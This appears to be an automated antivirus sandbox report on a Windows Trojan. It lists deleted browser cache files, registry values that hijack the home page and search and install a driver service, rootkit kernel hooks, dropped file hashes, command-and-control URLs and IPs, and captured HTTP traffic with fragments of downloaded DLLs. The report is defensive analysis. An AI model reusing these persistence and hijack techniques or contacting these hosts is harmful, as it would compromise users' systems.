C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

Registry activity

The process 6d4509907f6984392fadff64d29afe6.exe:1744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"ErrorControl" = "1"
"ImagePath" = "\DosDevices\C:\Windows\system32\2036c9\CDClient_EX.sys"
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90093888_hao_pg"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.baidu.com/s?word={searchTerms}&tn=90093888_hao_pg&ie=utf-8"

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"Devname" = "3Lb1eCjYYLQU"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\System\CurrentControlSet\services\3Lb1eCjYYLQ]
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

Dropped PE files

MD5 File path
b5c5dcad3899512020d135600129d665 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\FuYQjy\NRYLflMJ.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\2036c9\If56Km8kP8g.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1253376 1014272 5.54504 3ed3fbe35ed89dfd463fa93ee94a9ae0
.rsrc 1257472 8192 5632 4.73277 28a61ba0fe06d9920c6300a0d89f1182

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=59901 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://www.58sky.com/index/getcfg?id=216 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/
hxxp://wdx.go890.com/d2/x86.dll 87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
1212.ip138.com 183.238.101.232


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /index/getcfg?id=216 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.8.1
Date: Tue, 03 Jan 2017 21:53:03 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
400a..............[..H..._.,...J.!.6  ....8O3.c......BW`.h..>...G..
.........N.A\<.....9.._~..._....~==......./!..m.........~.Wer.6.*._
..._....u...Q..\..G...../.........%..'.....S.n.b...m....D... wk..M^...
.^.....lX]..0ue......?..9.On.&mZ..../..cr...e.....|.....H..O:....ofHV.
n.Jo..7..'..`o...ovQ1........6...kZ$.......n< ..A.\Os.........k}.a.
....>X....KC.....M..N.l..c..}.......[............._...o._....o....h
.._...._..................5..|.>..8.V...2....^..a<?.|i.......{.;
...>.t..... .l.q..".E..i{..]...S....f.2... \.N-M....R.?....[}...y."
I..._.{.w.o]..O0O........]v..Kg....s..9;..H.U...K.-w..N^. ..n....>.
......n....K<.o...v.....i&...7.I.=fCB....@H.R2.&4.yg.fu.z8........z
..=D..=....7......8....|.{.h.....i..O......t>..k...?A.....B...|{t..
..5_..........._...._.I......7.............5...........w._..n&B..o....
.).n.....|.......a..-!.M..~ J...U..u}.Us].B..y....p....}s..~..6..n....
..S.>.=y.}.=9....8......n....y..3P..x..zHn.3..s.......8.C.n.}/.p..:
.>{{6........z.. ...k./..]..Z..I..i....u..\{..m7..\.aA....iN.%w-...
.d.....{3.v....3w..o.Y.6....J...>.)]......c.....<....Aq..#.~..d.
Q.,.iNu..."K...P..c...:'......(.g..i...-..n..d....S.....f.y..e....\...
>Q..wQ0.(On...K.\rc).h...6...........{.Gr...^./.nB....3=:......rg..
7<.Ud.6.-o.h.....0?w...5.~{tB.....UY...Ye...S..}....^....$iQ'.1n0.2
9..uT..,.9.......r....]..%.--.;.=.[Bf.........;._w.]...l.p.........,..
.#.....<.2...9.3..7d.h....u:.O.....k6..F..<....?.G...=0...?.Q..W
L....p...@.}...tF.....\].[..`.... a.......-..w...S......D..\......
<<< skipped >>>


GET /d2/x86.dll HTTP/1.1
Host: wdx.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 20:33:58 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 03:51:43 GMT
Content-Length: 19213
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Thu, 29 Dec 2016 03:16:04 GMT
Accept-Ranges: bytes
ETag: "aebe84e38161d21:14727"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 64891
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
. ..html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h
3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,t
h,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:
0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var
{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th
{text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{co
ntent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:
text-top}sub{vertical-align:text-bottom}input,textarea,select{font-fam
ily:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}lege
nd{color:#000}.....html{height:100%;}.....body{height: 100%;font-size:
 14px;}.....table{table-layout:fixed;border-collapse: collapse;border-
spacing: 0;margin: 0 auto;}.....input,button{font-family: Tahoma,Arial
, Helvetica,"Microsoft Yahei";}.....a{color: #1c5f82;text-decorati
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 21:12:05 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 03 Jan 2017 07:42:38 GMT
Content-Type: application/octet-stream
Content-Length: 891904
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....R..........@a.......p....@.................................A.....
..................................T........p..m.......................
......................................................................
..............CODE.....`.......t......PEC2^O...... ....rsrc....0...p..
."...x.............. ....reloc..............................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................M...b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K........e
.Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R....
...O.....X}...5..(..q0..g>....U..!...G:5t...n.'9..M.....~&.h.ay#NA%
@....X.=x.....;.r~...FW.....)3.....=..3..L.....CZTX..`......... ..
<<< skipped >>>


GET /index/getcfg?id=59901 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.4.4
Date: Tue, 03 Jan 2017 21:52:47 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
8b6..............i......P>.Z...............[..aK.A..-......D.r.v.4H
..p8..=...........z.Ji..d..>|].kXH..f..o.o...SBM..#Z>.|l.M`.....
.X.R.V..Wq..... .HX....p!...[,..j..?H... .5..!.]...X...i.^....D1X.....
.,~..%i.T...B.C..|.$.1..........~.a]..O....k.Q5p.~.....P>Ho..n.lv!g
..c......~...W'...e.;R&#a.iK..0<c:.wg..{.1*......i .[.z=..dIHT.o?..
F{...'...v..\W......=.i.@z.=.......... . ..a..!...R.[...;.Bl9...3.....
..Mm....3.O~......rN.Y...H..yP..:..AK{..l@..e....$Ef..^%...q.X....E.."
..._.#..>...6po.... ..pf..@*..1........D.,.&. \.....W.Y.-9FG..p.u..
t..^...M7F..U.g...*...0.`.......sD@.?.>...L......7.]..k....j.......
...~.}...~wd./.n6......CDXo.wY....'..dE..3)..wYU.....7...\-x..O{Zk. I.
WN.6.<1..??.n....^:x....r.x.........!i...W...8..`,v..... .......V.t
.$Q...M...Y.7..'~......n........e.ePw..,.Sn.N'..k..q..a8...[RP.[(.!...
.I.,G..T..2.......M.8.!.h..G...Z'.C'k.X..C...d0..6s..Xb.`V4..)...R..f.
..k-].Z..p.....p..K.2.5P...R.r.....V..))....=...k...T'YM$.0..J.A...33.
yN...[..%.$..'`.,...LXRlU...i.)0.o.lH..............>=.=.5i..c=..3z.
.<S.c....BJ^O.C,.H5qD..u.Q.-.:.../].......i.....;....(].....L..w=..
Q....DaVd.O.....'...#M.a....,Q...#.A0.>...<.f.%.8*..=g...;B...&.
k.a.7'.$.(.Z..&II..OZ){t.,.C}.>.pw...m.CZ..E;N.....@. ....\u#.0..P\
5. ,U8.O.u.6vr.......d...Y.F,9....W.....m.=&I..L.g.e|^..M$X.B.^.G..rj.
t.|.9..GM.m.-t.........O...:....I...d.DL...!ht..8..K...w......I8'9.._.
6..xA.@..VB....>....8.c.af...d.Y.K0=!...0..O..7..:*.........~'/....
......._..b.....fkl.M..f.......pnZ.....5...iP.AO...4.....1...3b..Y
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

SearchProtocolHost.exe_2704:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3844:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2472
